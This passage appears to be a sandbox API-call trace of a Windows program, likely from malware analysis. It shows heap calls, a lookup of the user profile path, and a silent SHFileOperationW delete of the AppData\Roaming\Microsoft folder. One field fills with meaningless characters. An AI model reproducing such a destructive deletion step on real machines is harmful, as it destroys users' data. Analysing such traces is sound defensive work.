ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x300a046, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Word", cAlternateFileName="")) returned 0 [0124.348] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0124.348] GetLastError () returned 0x12 [0124.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0124.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0124.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0124.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0124.348] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0124.348] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0124.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0124.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0124.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0124.348] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0124.349] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0124.349] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0124.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0124.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0124.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0124.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0124.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0124.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0124.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0124.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0124.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0124.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0124.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0124.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x54) returned 0x2a5f7e0 [0124.350] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Microsoft", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft", lpFilePart=0x8cf650*="Microsoft") returned 0x29 [0124.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f7e0 | out: hHeap=0x2af0000) returned 1 [0124.350] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft")) returned 0x14 [0124.351] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 2 [0138.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0138.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0138.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0138.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0138.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0138.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0138.431] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0138.431] TranslateMessage (lpMsg=0x8cf968) returned 0 [0138.431] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0138.431] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0138.432] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0138.432] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0138.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0138.432] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0138.432] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0138.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0138.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0138.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0138.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0138.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0138.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0138.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0138.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0138.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0138.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0138.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0138.432] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0138.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0138.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mozilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0138.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0138.432] CompareStringW (Locale=0x400, 